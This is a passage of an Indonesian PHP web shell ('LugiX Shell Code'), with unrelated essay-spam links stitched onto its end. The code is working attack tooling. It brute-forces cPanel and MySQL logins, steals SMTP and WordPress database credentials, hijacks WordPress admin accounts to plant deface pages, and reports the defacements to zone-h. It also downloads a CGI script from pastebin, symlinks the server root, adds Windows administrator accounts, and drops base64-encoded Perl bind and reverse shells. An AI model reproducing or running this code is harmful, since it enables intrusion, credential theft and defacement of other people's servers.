"; } } elseif($_GET['do'] == 'cpanel') { if($_POST['crack']) { $usercp = explode("\r\n", $_POST['user_cp']); $passcp = explode("\r\n", $_POST['pass_cp']); $i = 0; foreach($usercp as $ucp) { foreach($passcp as $pcp) { if(@mysql_connect('localhost', $ucp, $pcp)) { if($_SESSION[$ucp] && $_SESSION[$pcp]) { } else { $_SESSION[$ucp] = "1"; $_SESSION[$pcp] = "1"; if($ucp == '' || $pcp == '') { } else { $i++; if(function_exists('posix_getpwuid')) { $domain_cp = file_get_contents("/etc/named.conf"); if($domain_cp == '') { $dom = "gabisa ambil nama domain nya"; } else { preg_match_all("#/var/named/(.*?).db#", $domain_cp, $domains_cp); foreach($domains_cp[1] as $dj) { $user_cp_url = posix_getpwuid(@fileowner("/etc/valiases/$dj")); $user_cp_url = $user_cp_url['name']; if($user_cp_url == $ucp) { $dom = "$dj"; break; } } } } else { $dom = "function is Disable by system"; } echo "username ($ucp) password ($pcp) domain ($dom)
"; } } } } } if($i == 0) { } else { echo "
sukses nyolong ".$i." Cpanel by LugiX Shell Code."; } } else { echo "


USER:

PASS:

NB: CPanel Crack ini sudah auto get password ( pake db password ) maka akan work jika dijalankan di dalam folder config ( ex: /home/user/public_html/nama_folder_config )

"; } } elseif($_GET['do'] == 'cpftp_auto') { if($_POST['crack']) { $usercp = explode("\r\n", $_POST['user_cp']); $passcp = explode("\r\n", $_POST['pass_cp']); $i = 0; foreach($usercp as $ucp) { foreach($passcp as $pcp) { if(@mysql_connect('localhost', $ucp, $pcp)) { if($_SESSION[$ucp] && $_SESSION[$pcp]) { } else { $_SESSION[$ucp] = "1"; $_SESSION[$pcp] = "1"; if($ucp == '' || $pcp == '') { // } else { echo "[+] username ($ucp) password ($pcp)
"; $ftp_conn = ftp_connect($ip); $ftp_login = ftp_login($ftp_conn, $ucp, $pcp); if((!$ftp_login) || (!$ftp_conn)) { echo "[+] Login Gagal

"; } else { echo "[+] Login Sukses
"; $fi = htmlspecialchars($_POST['file_deface']); $deface = ftp_put($ftp_conn, "public_html/$fi", $_POST['deface'], FTP_BINARY); if($deface) { $i++; echo "[+] Deface Sukses
"; if(function_exists('posix_getpwuid')) { $domain_cp = file_get_contents("/etc/named.conf"); if($domain_cp == '') { echo "[+] gabisa ambil nama domain nya

"; } else { preg_match_all("#/var/named/(.*?).db#", $domain_cp, $domains_cp); foreach($domains_cp[1] as $dj) { $user_cp_url = posix_getpwuid(@fileowner("/etc/valiases/$dj")); $user_cp_url = $user_cp_url['name']; if($user_cp_url == $ucp) { echo "[+] http://$dj/$fi

"; break; } } } } else { echo "[+] gabisa ambil nama domain nya

"; } } else { echo "[-] Deface Gagal

"; } } //echo "username ($ucp) password ($pcp)
"; } } } } } if($i == 0) { } else { echo "
sukses deface ".$i." Cpanel by Lugix Shell Code."; } } else { echo "


Filename:

Deface Page:

USER:

PASS:

NB: CPanel Crack ini sudah auto get password ( pake db password ) maka akan work jika dijalankan di dalam folder config ( ex: /home/user/public_html/nama_folder_config )

"; } } elseif($_GET['do'] == 'smtp') { echo "
NB: Tools ini work jika dijalankan di dalam folder config ( ex: /home/user/public_html/nama_folder_config )

"; function scj($dir) { $dira = scandir($dir); foreach($dira as $dirb) { if(!is_file("$dir/$dirb")) continue; $ambil = file_get_contents("$dir/$dirb"); $ambil = str_replace("$", "", $ambil); if(preg_match("/JConfig|joomla/", $ambil)) { $smtp_host = ambilkata($ambil,"smtphost = '","'"); $smtp_auth = ambilkata($ambil,"smtpauth = '","'"); $smtp_user = ambilkata($ambil,"smtpuser = '","'"); $smtp_pass = ambilkata($ambil,"smtppass = '","'"); $smtp_port = ambilkata($ambil,"smtpport = '","'"); $smtp_secure = ambilkata($ambil,"smtpsecure = '","'"); echo "SMTP Host: $smtp_host
"; echo "SMTP port: $smtp_port
"; echo "SMTP user: $smtp_user
"; echo "SMTP pass: $smtp_pass
"; echo "SMTP auth: $smtp_auth
"; echo "SMTP secure: $smtp_secure

"; } } } $smpt_hunter = scj($dir); echo $smpt_hunter; } elseif($_GET['do'] == 'auto_wp') { if($_POST['hajar']) { $title = htmlspecialchars($_POST['new_title']); $pn_title = str_replace(" ", "-", $title); if($_POST['cek_edit'] == "Y") { $script = $_POST['edit_content']; } else { $script = $title; } $conf = $_POST['config_dir']; $scan_conf = scandir($conf); foreach($scan_conf as $file_conf) { if(!is_file("$conf/$file_conf")) continue; $config = file_get_contents("$conf/$file_conf"); if(preg_match("/WordPress/", $config)) { $dbhost = ambilkata($config,"DB_HOST', '","'"); $dbuser = ambilkata($config,"DB_USER', '","'"); $dbpass = ambilkata($config,"DB_PASSWORD', '","'"); $dbname = ambilkata($config,"DB_NAME', '","'"); $dbprefix = ambilkata($config,"table_prefix = '","'"); $prefix = $dbprefix."posts"; $option = $dbprefix."options"; $conn = mysql_connect($dbhost,$dbuser,$dbpass); $db = mysql_select_db($dbname); $q = mysql_query("SELECT * FROM $prefix ORDER BY ID ASC"); $result = mysql_fetch_array($q); $id = $result[ID]; $q2 = mysql_query("SELECT * FROM $option ORDER BY option_id ASC"); $result2 = mysql_fetch_array($q2); $target = $result2[option_value]; $update = mysql_query("UPDATE $prefix SET post_title='$title',post_content='$script',post_name='$pn_title',post_status='publish',comment_status='open',ping_status='open',post_type='post',comment_count='1' WHERE id='$id'"); $update .= mysql_query("UPDATE $option SET option_value='$title' WHERE option_name='blogname' OR option_name='blogdescription'"); echo "

"; if($target == '') { echo "URL: error, gabisa ambil nama domain nya -> "; } else { echo "URL: $target/?p=$id -> "; } if(!$update OR !$conn OR !$db) { echo "MySQL Error: ".mysql_error()."
"; } else { echo "sukses di ganti.
"; } echo "

"; mysql_close($conn); } } } else { echo "


Auto Edit Title+Content WordPress

DIR Config:

Set Title:

Edit Content?: YN
Jika pilih Y masukin script defacemu ( saran yang simple aja ), kalo pilih N gausah di isi.


NB: Tools ini work jika dijalankan di dalam folder config ( ex: /home/user/public_html/nama_folder_config )
"; } }elseif($_GET['do'] == 'defacerid') { echo "


Defacer:

Team:

Domains:

"; $site = explode("\r\n", $_POST['sites']); $go = $_POST['go']; $hekel = $_POST['hekel']; $tim = $_POST['tim']; if($go) { foreach($site as $sites) { $zh = $sites; $form_url = "https://www.defacer.id/notify"; $data_to_post = array(); $data_to_post['attacker'] = "$hekel"; $data_to_post['team'] = "$tim"; $data_to_post['poc'] = 'SQL Injection'; $data_to_post['url'] = "$zh"; $curl = curl_init(); curl_setopt($curl,CURLOPT_URL, $form_url); curl_setopt($curl,CURLOPT_POST, sizeof($data_to_post)); curl_setopt($curl, CURLOPT_USERAGENT, "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)"); //msnbot/1.0 (+http://search.msn.com/msnbot.htm) curl_setopt($curl,CURLOPT_POSTFIELDS, $data_to_post); curl_setopt($curl, CURLOPT_RETURNTRANSFER, 1); curl_setopt($curl, CURLOPT_REFERER, 'https://defacer.id/notify.html'); $result = curl_exec($curl); echo $result; curl_close($curl); echo "
"; } } } elseif($_GET['do'] == 'zoneh') { if($_POST['submit']) { $domain = explode("\r\n", $_POST['url']); $nick = $_POST['nick']; echo "Defacer Onhold: http://www.zone-h.org/archive/notifier=$nick/published=0
"; echo "Defacer Archive: http://www.zone-h.org/archive/notifier=$nick

"; function zoneh($url,$nick) { $ch = curl_init("http://www.zone-h.com/notify/single"); curl_setopt($ch, CURLOPT_RETURNTRANSFER, true); curl_setopt($ch, CURLOPT_POST, true); curl_setopt($ch, CURLOPT_POSTFIELDS, "defacer=$nick&domain1=$url&hackmode=1&reason=1&submit=Send"); return curl_exec($ch); curl_close($ch); } foreach($domain as $url) { $zoneh = zoneh($url,$nick); if(preg_match("/color=\"red\">OK<\/font><\/li>/i", $zoneh)) { echo "$url -> OK
"; } else { echo "$url -> ERROR
"; } } } else { echo "


Defacer:

Domains:

"; } echo "

"; } elseif($_GET['do'] == 'cgi') { $cgi_dir = mkdir('idx_cgi', 0755); $file_cgi = "idx_cgi/cgi.izo"; $isi_htcgi = "AddHandler cgi-script .izo"; $htcgi = fopen(".htaccess", "w"); $cgi_script = file_get_contents("http://pastebin.com/raw.php?i=XTUFfJLg"); $cgi = fopen($file_cgi, "w"); fwrite($cgi, $cgi_script); fwrite($htcgi, $isi_htcgi); chmod($file_cgi, 0755); echo ""; } elseif($_GET['do'] == 'fake_root') { ob_start(); $cwd = getcwd(); $ambil_user = explode("/", $cwd); $user = $ambil_user[2]; if($_POST['reverse']) { $site = explode("\r\n", $_POST['url']); $file = $_POST['file']; foreach($site as $url) { $cek = getsource("$url/~$user/$file"); if(preg_match("/hacked/i", $cek)) { echo "URL: $url/~$user/$file -> Fake Root!
"; } } } else { echo "

Filename:

User:

Domain:

NB: Sebelum gunain Tools ini , upload dulu file deface kalian di dir /home/user/ dan /home/user/public_html.

"; } } elseif($_GET['do'] == 'symlink') { @set_time_limit(0); echo "


Symlink

"; @mkdir('sym',0777); $htaccess = "Options all \n DirectoryIndex Sux.html \n AddType text/plain .php \n AddHandler server-parsed .php \n AddType text/plain .html \n AddHandler txt .html \n Require None \n Satisfy Any"; $write =@fopen ('sym/.htaccess','w'); fwrite($write ,$htaccess); @symlink('/','sym/root'); $filelocation = basename(__FILE__); $read_named_conf = @file('/etc/named.conf'); if(!$read_named_conf) { echo " 
# Cant access this file on server -> [ /etc/named.conf ]

"; } else { echo "

"; foreach($read_named_conf as $subject){ if(eregi('zone',$subject)){ preg_match_all('#zone "(.*)"#',$subject,$string); flush(); if(strlen(trim($string[1][0])) >2){ $UID = posix_getpwuid(@fileowner('/etc/valiases/'.$string[1][0])); $name = $UID['name'] ; @symlink('/','sym/root'); $name = $string[1][0]; $iran = '\.ir'; $israel = '\.il'; $indo = '\.id'; $sg12 = '\.sg'; $edu = '\.edu'; $gov = '\.gov'; $gose = '\.go'; $gober = '\.gob'; $mil1 = '\.mil'; $mil2 = '\.mi'; $malay = '\.my'; $china = '\.cn'; $japan = '\.jp'; $austr = '\.au'; $porn = '\.xxx'; $as = '\.uk'; $calfn = '\.ca'; if (eregi("$iran",$string[1][0]) or eregi("$israel",$string[1][0]) or eregi("$indo",$string[1][0])or eregi("$sg12",$string[1][0]) or eregi ("$edu",$string[1][0]) or eregi ("$gov",$string[1][0]) or eregi ("$gose",$string[1][0]) or eregi("$gober",$string[1][0]) or eregi("$mil1",$string[1][0]) or eregi ("$mil2",$string[1][0]) or eregi ("$malay",$string[1][0]) or eregi("$china",$string[1][0]) or eregi("$japan",$string[1][0]) or eregi ("$austr",$string[1][0]) or eregi("$porn",$string[1][0]) or eregi("$as",$string[1][0]) or eregi ("$calfn",$string[1][0])) { $name = "

".$string[1][0].'

'; } echo "

"; flush(); } } } } echo "

Domains Users symlink
'.$name.'
'.$UID['name']." Symlink

"; } elseif($_GET['do'] == 'adminer') { $full = str_replace($_SERVER['DOCUMENT_ROOT'], "", $dir); function adminer($url, $isi) { $fp = fopen($isi, "w"); $ch = curl_init(); curl_setopt($ch, CURLOPT_URL, $url); curl_setopt($ch, CURLOPT_BINARYTRANSFER, true); curl_setopt($ch, CURLOPT_RETURNTRANSFER, true); curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false); curl_setopt($ch, CURLOPT_FILE, $fp); return curl_exec($ch); curl_close($ch); fclose($fp); ob_flush(); flush(); } if(file_exists('adminer.php')) { echo "

-> adminer login <-
"; } else { if(adminer("https://www.adminer.org/static/download/4.2.4/adminer-4.2.4.php","adminer.php")) { echo "
-> adminer login <-
"; } else { echo "
gagal buat file adminer
"; } } } elseif($_GET['do'] == 'auto_dwp') { if($_POST['auto_deface_wp']) { function anucurl($sites) { $ch = curl_init($sites); curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1); curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1); curl_setopt($ch, CURLOPT_USERAGENT, "Mozilla/5.0 (Windows NT 6.1; rv:32.0) Gecko/20100101 Firefox/32.0"); curl_setopt($ch, CURLOPT_CONNECTTIMEOUT, 5); curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, 0); curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, 0); curl_setopt($ch, CURLOPT_COOKIEJAR,'cookie.txt'); curl_setopt($ch, CURLOPT_COOKIEFILE,'cookie.txt'); curl_setopt($ch, CURLOPT_COOKIESESSION, true); $data = curl_exec($ch); curl_close($ch); return $data; } function lohgin($cek, $web, $userr, $pass, $wp_submit) { $post = array( "log" => "$userr", "pwd" => "$pass", "rememberme" => "forever", "wp-submit" => "$wp_submit", "redirect_to" => "$web", "testcookie" => "1", ); $ch = curl_init($cek); curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1); curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1); curl_setopt($ch, CURLOPT_USERAGENT, "Mozilla/5.0 (Windows NT 6.1; rv:32.0) Gecko/20100101 Firefox/32.0"); curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, 0); curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, 0); curl_setopt($ch, CURLOPT_POST, 1); curl_setopt($ch, CURLOPT_POSTFIELDS, $post); curl_setopt($ch, CURLOPT_COOKIEJAR,'cookie.txt'); curl_setopt($ch, CURLOPT_COOKIEFILE,'cookie.txt'); curl_setopt($ch, CURLOPT_COOKIESESSION, true); $data = curl_exec($ch); curl_close($ch); return $data; } $scan = $_POST['link_config']; $link_config = scandir($scan); $script = htmlspecialchars($_POST['script']); $user = "global"; $pass = "global"; $passx = md5($pass); foreach($link_config as $dir_config) { if(!is_file("$scan/$dir_config")) continue; $config = file_get_contents("$scan/$dir_config"); if(preg_match("/WordPress/", $config)) { $dbhost = ambilkata($config,"DB_HOST', '","'"); $dbuser = ambilkata($config,"DB_USER', '","'"); $dbpass = ambilkata($config,"DB_PASSWORD', '","'"); $dbname = ambilkata($config,"DB_NAME', '","'"); $dbprefix = ambilkata($config,"table_prefix = '","'"); $prefix = $dbprefix."users"; $option = $dbprefix."options"; $conn = mysql_connect($dbhost,$dbuser,$dbpass); $db = mysql_select_db($dbname); $q = mysql_query("SELECT * FROM $prefix ORDER BY id ASC"); $result = mysql_fetch_array($q); $id = $result[ID]; $q2 = mysql_query("SELECT * FROM $option ORDER BY option_id ASC"); $result2 = mysql_fetch_array($q2); $target = $result2[option_value]; if($target == '') { echo "[-] error, gabisa ambil nama domain nya
"; } else { echo "[+] $target
"; } $update = mysql_query("UPDATE $prefix SET user_login='$user',user_pass='$passx' WHERE ID='$id'"); if(!$conn OR !$db OR !$update) { echo "[-] MySQL Error: ".mysql_error()."

"; mysql_close($conn); } else { $site = "$target/wp-login.php"; $site2 = "$target/wp-admin/theme-install.php?upload"; $b1 = anucurl($site2); $wp_sub = ambilkata($b1, "id=\"wp-submit\" class=\"button button-primary button-large\" value=\"","\" />"); $b = lohgin($site, $site2, $user, $pass, $wp_sub); $anu2 = ambilkata($b,"name=\"_wpnonce\" value=\"","\" />"); $upload3 = base64_decode("Z2FudGVuZw0KPD9waHANCiRmaWxlMyA9ICRfRklMRVNbJ2ZpbGUzJ107DQogICRuZXdmaWxlMz0iay5waHAiOw0KICAgICAgICAgICAgICAgIGlmIChmaWxlX2V4aXN0cygiLi4vLi4vLi4vLi4vIi4kbmV3ZmlsZTMpKSB1bmxpbmsoIi4uLy4uLy4uLy4uLyIuJG5ld2ZpbGUzKTsNCiAgICAgICAgbW92ZV91cGxvYWRlZF9maWxlKCRmaWxlM1sndG1wX25hbWUnXSwgIi4uLy4uLy4uLy4uLyRuZXdmaWxlMyIpOw0KDQo/Pg=="); $www = "m.php"; $fp5 = fopen($www,"w"); fputs($fp5,$upload3); $post2 = array( "_wpnonce" => "$anu2", "_wp_http_referer" => "/wp-admin/theme-install.php?upload", "themezip" => "@$www", "install-theme-submit" => "Install Now", ); $ch = curl_init("$target/wp-admin/update.php?action=upload-theme"); curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1); curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1); curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, 0); curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, 0); curl_setopt($ch, CURLOPT_POST, 1); curl_setopt($ch, CURLOPT_POSTFIELDS, $post2); curl_setopt($ch, CURLOPT_COOKIEJAR,'cookie.txt'); curl_setopt($ch, CURLOPT_COOKIEFILE,'cookie.txt'); curl_setopt($ch, CURLOPT_COOKIESESSION, true); $data3 = curl_exec($ch); curl_close($ch); $y = date("Y"); $m = date("m"); $namafile = "id.php"; $fpi = fopen($namafile,"w"); fputs($fpi,$script); $ch6 = curl_init("$target/wp-content/uploads/$y/$m/$www"); curl_setopt($ch6, CURLOPT_POST, true); curl_setopt($ch6, CURLOPT_POSTFIELDS, array('file3'=>"@$namafile")); curl_setopt($ch6, CURLOPT_RETURNTRANSFER, 1); curl_setopt($ch6, CURLOPT_COOKIEFILE, "cookie.txt"); curl_setopt($ch6, CURLOPT_COOKIEJAR,'cookie.txt'); curl_setopt($ch6, CURLOPT_COOKIESESSION, true); $postResult = curl_exec($ch6); curl_close($ch6); $as = "$target/k.php"; $bs = anucurl($as); if(preg_match("#$script#is", $bs)) { echo "[+] berhasil mepes...
"; echo "[+] $as

"; } else { echo "[-] gagal mepes...
"; echo "[!!] coba aja manual:
"; echo "[+] $target/wp-login.php
"; echo "[+] username: $user
"; echo "[+] password: $pass

"; } mysql_close($conn); } } } } else { echo "


WordPress Auto Deface



NB: Tools ini work jika dijalankan di dalam folder config ( ex: /home/user/public_html/nama_folder_config )

"; } } elseif($_GET['do'] == 'network') { echo "
Bind Port:
PORT:
Back Connect:
Server: �� PORT:

"; $bind_port_p="IyEvdXNyL2Jpbi9wZXJsDQokU0hFTEw9Ii9iaW4vc2ggLWkiOw0KaWYgKEBBUkdWIDwgMSkgeyBleGl0KDEpOyB9DQp1c2UgU29ja2V0Ow0Kc29ja2V0KFMsJlBGX0lORVQsJlNPQ0tfU1RSRUFNLGdldHByb3RvYnluYW1lKCd0Y3AnKSkgfHwgZGllICJDYW50IGNyZWF0ZSBzb2NrZXRcbiI7DQpzZXRzb2Nrb3B0KFMsU09MX1NPQ0tFVCxTT19SRVVTRUFERFIsMSk7DQpiaW5kKFMsc29ja2FkZHJfaW4oJEFSR1ZbMF0sSU5BRERSX0FOWSkpIHx8IGRpZSAiQ2FudCBvcGVuIHBvcnRcbiI7DQpsaXN0ZW4oUywzKSB8fCBkaWUgIkNhbnQgbGlzdGVuIHBvcnRcbiI7DQp3aGlsZSgxKSB7DQoJYWNjZXB0KENPTk4sUyk7DQoJaWYoISgkcGlkPWZvcmspKSB7DQoJCWRpZSAiQ2Fubm90IGZvcmsiIGlmICghZGVmaW5lZCAkcGlkKTsNCgkJb3BlbiBTVERJTiwiPCZDT05OIjsNCgkJb3BlbiBTVERPVVQsIj4mQ09OTiI7DQoJCW9wZW4gU1RERVJSLCI+JkNPTk4iOw0KCQlleGVjICRTSEVMTCB8fCBkaWUgcHJpbnQgQ09OTiAiQ2FudCBleGVjdXRlICRTSEVMTFxuIjsNCgkJY2xvc2UgQ09OTjsNCgkJZXhpdCAwOw0KCX0NCn0="; if(isset($_POST['sub_bp'])) { $f_bp = fopen("/tmp/bp.pl", "w"); fwrite($f_bp, base64_decode($bind_port_p)); fclose($f_bp); $port = $_POST['port_bind']; $out = exe("perl /tmp/bp.pl $port 1>/dev/null 2>&1 &"); sleep(1); echo " 

".$out."\n".exe("ps aux | grep bp.pl")."

"; unlink("/tmp/bp.pl"); } $back_connect_p="IyEvdXNyL2Jpbi9wZXJsDQp1c2UgU29ja2V0Ow0KJGlhZGRyPWluZXRfYXRvbigkQVJHVlswXSkgfHwgZGllKCJFcnJvcjogJCFcbiIpOw0KJHBhZGRyPXNvY2thZGRyX2luKCRBUkdWWzFdLCAkaWFkZHIpIHx8IGRpZSgiRXJyb3I6ICQhXG4iKTsNCiRwcm90bz1nZXRwcm90b2J5bmFtZSgndGNwJyk7DQpzb2NrZXQoU09DS0VULCBQRl9JTkVULCBTT0NLX1NUUkVBTSwgJHByb3RvKSB8fCBkaWUoIkVycm9yOiAkIVxuIik7DQpjb25uZWN0KFNPQ0tFVCwgJHBhZGRyKSB8fCBkaWUoIkVycm9yOiAkIVxuIik7DQpvcGVuKFNURElOLCAiPiZTT0NLRVQiKTsNCm9wZW4oU1RET1VULCAiPiZTT0NLRVQiKTsNCm9wZW4oU1RERVJSLCAiPiZTT0NLRVQiKTsNCnN5c3RlbSgnL2Jpbi9zaCAtaScpOw0KY2xvc2UoU1RESU4pOw0KY2xvc2UoU1RET1VUKTsNCmNsb3NlKFNUREVSUik7"; if(isset($_POST['sub_bc'])) { $f_bc = fopen("/tmp/bc.pl", "w"); fwrite($f_bc, base64_decode($bind_connect_p)); fclose($f_bc); $ipbc = $_POST['ip_bc']; $port = $_POST['port_bc']; $out = exe("perl /tmp/bc.pl $ipbc $port 1>/dev/null 2>&1 &"); sleep(1); echo " 

".$out."\n".exe("ps aux | grep bc.pl")."

"; unlink("/tmp/bc.pl"); } } elseif($_GET['do'] == 'krdp_shell') { if(strtolower(substr(PHP_OS, 0, 3)) === 'win') { if($_POST['create']) { $user = htmlspecialchars($_POST['user']); $pass = htmlspecialchars($_POST['pass']); if(preg_match("/$user/", exe("net user"))) { echo "[INFO] -> user $user sudah ada"; } else { $add_user = exe("net user $user $pass /add"); $add_groups1 = exe("net localgroup Administrators $user /add"); $add_groups2 = exe("net localgroup Administrator $user /add"); $add_groups3 = exe("net localgroup Administrateur $user /add"); echo "[ RDP ACCOUNT INFO ] ------------------------------
IP: ".$ip."
Username: $user
Password: $pass
------------------------------

[ STATUS ] ------------------------------
"; if($add_user) { echo "[add user] -> Berhasil
"; } else { echo "[add user] -> Gagal
"; } if($add_groups1) { echo "[add localgroup Administrators] -> Berhasil
"; } elseif($add_groups2) { echo "[add localgroup Administrator] -> Berhasil
"; } elseif($add_groups3) { echo "[add localgroup Administrateur] -> Berhasil
"; } else { echo "[add localgroup] -> Gagal
"; } echo "------------------------------
"; } } elseif($_POST['s_opsi']) { $user = htmlspecialchars($_POST['r_user']); if($_POST['opsi'] == '1') { $cek = exe("net user $user"); echo "Checking username $user ....... "; if(preg_match("/$user/", $cek)) { echo "[ Sudah ada ] ------------------------------

$cek

"; } else { echo "[ belum ada ]"; } } elseif($_POST['opsi'] == '2') { $cek = exe("net user $user global"); if(preg_match("/$user/", exe("net user"))) { echo "[change password: global] -> "; if($cek) { echo "Berhasil"; } else { echo "Gagal"; } } else { echo "[INFO] -> user $user belum ada"; } } elseif($_POST['opsi'] == '3') { $cek = exe("net user $user /DELETE"); if(preg_match("/$user/", exe("net user"))) { echo "[remove user: $user] -> "; if($cek) { echo "Berhasil"; } else { echo "Gagal"; } } else { echo "[INFO] -> user $user belum ada"; } } else { // } } else { echo "-- Create RDP --

-- Option --

"; } } else { echo "Fitur ini hanya dapat digunakan dalam Windows Server."; } } elseif($_GET['act'] == 'newfile') { if($_POST['new_save_file']) { $newfile = htmlspecialchars($_POST['newfile']); $fopen = fopen($newfile, "a+"); if($fopen) { $act = "

You may also like

Who’s Worried About Do My Essay for Me and Why You Should Listen to Them

Uncommon Article Gives You the Facts on School Book Report That Only a Few People Know Exist

Like a PhD university student, must I come up with a site about my analysis?